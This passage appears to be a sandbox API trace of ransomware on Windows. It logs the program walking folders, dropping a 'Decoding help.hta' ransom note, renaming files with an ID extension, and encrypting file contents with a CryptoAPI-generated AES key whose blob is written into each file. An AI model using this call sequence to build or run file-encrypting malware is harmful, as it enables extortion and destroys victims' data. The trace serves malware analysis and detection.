Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" [0050.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" [0050.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0053.648] CreateFileMappingA (hFile=0x534, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x354 [0053.649] CryptAcquireContextA (in: phProv=0x13a1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13a1fcec*=0x3449e80) returned 1 [0055.090] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x13a1fce8 | out: phKey=0x13a1fce8*=0x5d8a50) returned 1 [0055.090] CryptExportKey (in: hKey=0x5d8a50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13a1fbe4, pdwDataLen=0x13a1fce4 | out: pbData=0x13a1fbe4*, pdwDataLen=0x13a1fce4*=0x2c) returned 1 [0055.090] MapViewOfFile (hFileMappingObject=0x354, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85000) returned 0x8cb0000 [0055.093] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x13a1fbe4*, pdwDataLen=0x13a1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x13a1fbe4*, pdwDataLen=0x13a1fcf8*=0x100) returned 1 [0055.093] CryptEncrypt (in: hKey=0x5d8a50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000, pdwDataLen=0x13a1fce4*=0x85000, dwBufLen=0x85000 | out: pbData=0x8cb0000*, pdwDataLen=0x13a1fce4*=0x85000) returned 1 [0055.702] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0055.733] CloseHandle (hObject=0x354) returned 1 [0055.733] CryptDestroyKey (hKey=0x5d8a50) returned 1 [0055.733] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0055.733] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.733] WriteFile (in: hFile=0x534, lpBuffer=0x13a1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x13a1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x13a1fbe4*, lpNumberOfBytesWritten=0x13a1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.956] WriteFile (in: hFile=0x534, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x13a1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x13a1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.957] CloseHandle (hObject=0x534) returned 1 [0056.957] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x13a1fd30 | out: lpFindFileData=0x13a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x1dddd970, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0058.529] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" [0058.529] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned 50 [0058.529] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta" [0058.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\decoding help.hta")) returned 0x1 [0058.529] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x13a1fd30 | out: lpFindFileData=0x13a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x1dddd970, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0058.529] FindClose (in: hFindFile=0x5da8f8 | out: hFindFile=0x5da8f8) returned 1 Thread: id = 622 os_tid = 0xdfc [0048.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*", lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671530 [0049.773] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.773] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.773] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.773] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.773] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xda0a8861, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0050.095] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0050.095] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0050.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0050.096] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0xffffffff [0050.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x570 [0052.276] WriteFile (in: hFile=0x570, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1791fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1791fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.007] CloseHandle (hObject=0x570) returned 1 [0055.311] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.106] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile10.bmp") returned -1 [0058.106] lstrlenW (lpString="usertile10.bmp") returned 14 [0058.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.106] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile10.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" [0058.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" [0058.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.107] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb5a2927, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0058.107] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.107] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.107] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile11.bmp") returned -1 [0058.107] lstrlenW (lpString="usertile11.bmp") returned 14 [0058.107] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.107] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile11.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" [0058.107] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" [0058.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.107] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb6d3417, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0058.108] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.108] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.108] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.108] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile12.bmp") returned -1 [0058.108] lstrlenW (lpString="usertile12.bmp") returned 14 [0058.108] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.108] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.108] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile12.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" [0058.108] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" [0058.108] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.108] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb76b98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0058.108] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.108] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.108] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.108] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile13.bmp") returned -1 [0058.109] lstrlenW (lpString="usertile13.bmp") returned 14 [0058.109] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.109] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile13.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" [0058.109] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" [0058.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.109] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb82a065, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0058.109] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.109] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.109] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile14.bmp") returned -1 [0058.109] lstrlenW (lpString="usertile14.bmp") returned 14 [0058.109] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.109] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile14.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 